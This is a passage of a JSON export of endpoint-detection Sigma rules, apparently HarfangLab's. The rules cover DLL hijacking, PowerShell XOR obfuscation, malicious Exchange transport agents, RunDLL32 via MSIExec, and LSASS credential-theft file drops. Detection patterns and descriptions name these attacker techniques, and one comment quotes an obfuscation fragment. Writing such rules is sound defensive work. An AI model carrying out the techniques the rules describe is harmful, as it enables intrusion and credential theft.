classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "027c5f6b-cba7-426c-af04-233b87967507",
"rule_name": "DLL Hijacking via vssadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vssadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "029996a2-753c-4bd1-ac20-b8f180acbf90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.491571Z",
"creation_date": "2026-03-23T11:45:34.624842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624846Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/yellow-cockatoo/",
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/"
],
"name": "t1059_001_powershell_xor_obfuscation_script.yml",
"content": "title: PowerShell XOR Obfuscation\nid: 029996a2-753c-4bd1-ac20-b8f180acbf90\ndescription: |\n Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\n This is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\n It is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\n If the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # seen in PowerShell commandlines : ;$_-bXoR$S[($S[$I]+$S[$H])%256]}};\n selection:\n PowershellCommand|contains: '-bxor'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_remote_exchange:\n PowershellCommand|contains|all:\n - 'function ExportPSSessionAndImportModule'\n - 'hashValue -bxor ?CurrentUserRemotePSSettings.Hash'\n # function ExportPSSessionAndImportModule ($remotePSSettinsPath, $modulePath, [switch]$AllowClobber)\n # {\n # $hashValue = $global:remoteSession.ApplicationPrivateData.ImplicitRemoting.Hash\n # $CurrentUserRemotePSSettings = Get-ItemProperty -path $remotePSSettinsPath -ErrorAction SilentlyContinue\n # # PS3.0, Get-ItemProperty will return DWORD data as UInt32, instead of Int32 in PS2.0.\n # # If $hashValue is negative, (CurrentUserRemotePSSettings.Hash -ne $hashValue) will always be $true\n # # We use bitwise xor operation to work around\n # if (($CurrentUserRemotePSSettings -eq $null) `\n # -or ($CurrentUserRemotePSSettings.Hash -eq $null) `\n # -or (-not ($CurrentUserRemotePSSettings.ModulePath)) `\n # -or (($hashValue -bxor $CurrentUserRemotePSSettings.Hash) -ne 0))\n # {\n # # Redo Everything, when:\n # # 1. No registry entry found, or\n # # 2. Registry entry exists, but hash value or ModulePath is empty (which is very unlikely) or\n exclusion_sentinel_one:\n # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.6.2.272\\SentinelPie.bin\n PowershellScriptPath: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelPie.bin'\n\n exclusion_defender:\n # C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1\n - PowershellCommand|contains:\n - 'xor between (2^32 - 1) and (2^(32-cidr) - 1) giving a binary with (32-cidr) leading bits ON'\n - '[ipaddress]([math]::pow(2, 32) -1 -bxor'\n - 'pow(2, 32) -1 -bxor [math]::pow(2, (32 - $cidr))-1)'\n - ProcessParentImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n\n exclusion_desktop_ini_hidden:\n # https://github.com/Vincoll/PS_NetworkShortcutTreeview\n # https://github.com/pauby/oxygen\n PowershellCommand|contains|all:\n - 'Desktop.ini'\n - '-Name Attributes -Value ([IO.FileAttributes]::System -bxor [IO.FileAttributes]::Hidden'\n\n # https://www.powershellgallery.com/packages/dbatools/1.1.103/Content/functions%5CInvoke-DbaDbDecryptObject.ps1\n exclusion_dbatool1:\n PowershellCommand|contains|all:\n - 'function Invoke-DecryptData() {'\n - '# Loop through each of the characters and apply an XOR to decrypt the data'\n - '# Compare the byte string character to the key character using XOR'\n - '# Create array list to hold the results'\n exclusion_dbatool2:\n PowershellCommand|contains|all:\n - 'function Get-DbaProductKey {'\n - '.SYNOPSIS'\n exclusion_dbatool3:\n PowershellCommand|contains|all:\n - 'function Find-DbaInstance {'\n - '.SYNOPSIS'\n\n exclusion_ixbs_apps:\n ProcessGrandparentImage:\n - '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - '?:\\SRCI\\iXBs_Applications\\iXBus Server\\Plugins\\\\*\\service.exe'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n - '?:\\Program Files (x86)\\Spiceworks Agent Shell\\modules\\Inventory Module\\'\n\n exclusion_cyberwatch:\n - ProcessImage|endswith: 'CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CYBERWATCH SAS'\n - ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_ansible:\n - ProcessGrandparentCommandLine|contains:\n - 'powershell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains:\n - '?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\OpenSSH\\sshd.exe|?:\\Windows\\System32\\services.exe'\n - ProcessCommandLine|contains: 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains: '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - PowershellCommand|contains: '$module = [Ansible.Basic.AnsibleModule]::Create($args, $spec)'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_log4net:\n - PowershellScriptPath|endswith: '\\Log4Net-Module\\Log4Net-Module.psm1'\n - PowershellCommand|contains|all:\n - '# Example of File Appender initialization'\n - '$Log = [log4net.LogManager]::GetLogger(\"root\");'\n - '# $Log.$Level($Message); # Ne fonctionnait pas sous 2012 non R2 PS3.0'\n - '[log4net.LogManager]::ResetConfiguration();'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*.ps1'\n\n # https://github.com/DanysysTeam/PS-SFTA/blob/master/SFTA.ps1\n exclusion_sfta:\n PowershellCommand|contains|all:\n - 'https://github.com/DanysysTeam/PS-SFTA'\n - 'function Get-FTA {'\n - 'Write-Output (( $iValue -shr $iCount) -bxor 0xFFFF0000)'\n\n exclusion_sysvol:\n PowershellScriptPath|contains: '\\sysvol\\\\*\\Policies\\{????????-????-????-????-????????????}\\User\\Scripts\\'\n\n exclusion_avacee:\n ProcessParentImage: '?:\\Program Files\\Avacee\\sip_agent\\SIPAgent.exe'\n\n exclusion_wybot:\n ProcessParentImage: '?:\\Program Files\\osquery\\\\*.exe'\n Signed: 'true'\n Signature: 'WYBOT SAS'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "029996a2-753c-4bd1-ac20-b8f180acbf90",
"rule_name": "PowerShell XOR Obfuscation",
"rule_description": "Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\nThis is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\nIt is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\nIf the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "029b4b5e-5b84-4646-ae2b-9c19d795c627",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617032Z",
"creation_date": "2026-03-23T11:45:34.617036Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617043Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_edgetransport_loading_unsigned_dll.yml",
"content": "title: Exchange EdgeTransport.exe Loaded Unsigned DLL\nid: 029b4b5e-5b84-4646-ae2b-9c19d795c627\ndescription: |\n Detects the loading of an unsigned DLL into EdgeTransport.exe.\n Attackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/22\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EdgeTransport.exe'\n ImageLoaded|contains: '?'\n\n filter_empty:\n ImageSize: 0\n\n filter_microsoft_pdb:\n ManagedPdbBuildPath|startswith:\n - '?:\\dbs\\sh\\e16dt\\'\n - '?:\\dbs\\sh\\gffn\\'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n exclusion_msvcm:\n ImageLoaded: '?:\\Windows\\winsxs\\amd64_microsoft.vc*.crt_*\\msvcm*.dll'\n\n exclusion_trendmicro:\n ImageLoaded|startswith: '?:\\Program Files\\Trend Micro\\Smex\\'\n\n exclusion_newton_json:\n ManagedPdbBuildPath: '?:\\Development\\Releases\\Json\\Working\\Newtonsoft.Json\\Src\\Newtonsoft.Json\\obj\\Release\\Newtonsoft.Json.pdb'\n\n exclusion_skimsigner:\n ImageLoaded|startswith: '?:\\Program Files\\Exchange DkimSigner'\n\n exclusion_exclaimer:\n ImageLoaded|startswith: '?:\\Program Files\\Exclaimer Ltd\\Email Alias Manager\\'\n\n exclusion_xml_serializer:\n sha256: 'd934a6ed579619a0c0629606a0b774855703a5eec5661749e823d4456ed77e33'\n ImageLoaded|startswith: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\XmlSerializer.Exclaimer.LeanLicensing.License_'\n\n exclusion_passive_monitoring:\n sha256: '5eb73220279d1fa2525912a6e34061646990382b82dbd250297dbf6bbb8a9aaf'\n\n exclusion_mimekit:\n - ImageLoaded: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MimeKit.dll'\n - sha256: '69ae032bad923d3e9b7ad95b569222cdbe6ddcfb56cb302e7419869000b07dcd'\n\n exclusion_codetwo:\n ImageLoaded: '?:\\Program Files\\CodeTwo\\CodeTwo Exchange Rules\\\\*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "029b4b5e-5b84-4646-ae2b-9c19d795c627",
"rule_name": "Exchange EdgeTransport.exe Loaded Unsigned DLL",
"rule_description": "Detects the loading of an unsigned DLL into EdgeTransport.exe.\nAttackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "029c4324-60c2-46df-b249-b6b72b737c5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616491Z",
"creation_date": "2026-03-23T11:45:34.616495Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Cryptolaemus1/status/1733243361534857222",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_rundll32_msiexec.yml",
"content": "title: Suspicious RunDLL32 Execution via MSIExec\nid: 029c4324-60c2-46df-b249-b6b72b737c5e\ndescription: |\n Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\n Attackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\n Specifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\n This behavior is used by the Pikabot malware, in its initial infection chain.\n It is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1733243361534857222\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2023/12/11\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: '?:\\Users\\\\*\\AppData\\Local\\Temp'\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\msiexec.exe'\n\n exclusion_setupapi:\n CommandLine|contains: 'setupapi,InstallHinfSection'\n\n exclusion_adinstrument:\n CommandLine|contains: '\\ADInstruments\\LabChart8\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "029c4324-60c2-46df-b249-b6b72b737c5e",
"rule_name": "Suspicious RunDLL32 Execution via MSIExec",
"rule_description": "Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\nAttackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\nSpecifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\nThis behavior is used by the Pikabot malware, in its initial infection chain.\nIt is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297348Z",
"creation_date": "2026-03-23T11:45:35.297352Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297359Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz"
],
"name": "t1003_001_lsass_dropping_file_unknown_module.yml",
"content": "title: File Dropped by LSASS Process from Unknown Module\nid: 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2025/03/24\nmodified: 2026/03/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n exclusion_path:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\Keys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\System Volume Information\\EFS0.LOG'\n - '?:\\Windows\\NTDS\\edbtmp.log'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n - '?:\\Users\\\\*\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\\\????????-????-????-????-????????????'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\User\\\\????????-????-????-????-????????????'\n\n exclusion_credential_manager:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????????????????????????????????????.vcrd'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????.vsch'\n\n exclusion_securetimeaggregator:\n Path: '?:\\Windows\\System32\\\\????????-????-????-????-????????????'\n StackTrace|contains: '|?:\\Windows\\System32\\SecureTimeAggregator.dll!'\n\n exclusion_btpass:\n MinimalStackTrace|contains: '|BTPassAsm.dll|'\n Path: '?:\\Windows\\BTPass\\BT*.txt'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30",
"rule_name": "File Dropped by LSASS Process from Unknown Module",
"rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n",
"rule_creation_date": "2025-03-24",
"rule_modified_date": "2026-03-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02c15562-11e7-4250-b6e6-12f040b41450",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591575Z",
"creation_date": "2026-03-23T11:45:34.591579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591587Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iesettingsync.yml",
"content": "title: DLL Hijacking via IESettingSync.exe\nid: 02c15562-11e7-4250-b6e6-12f040b41450\ndescription: |\n Detects potential Windows DLL Hijacking via IESettingSync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IESettingSync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\iertutil.dll'\n - '\\mpr.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02c15562-11e7-4250-b6e6-12f040b41450",
"rule_name": "DLL Hijacking via IESettingSync.exe",
"rule_description": "Detects potential Windows DLL Hijacking via IESettingSync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
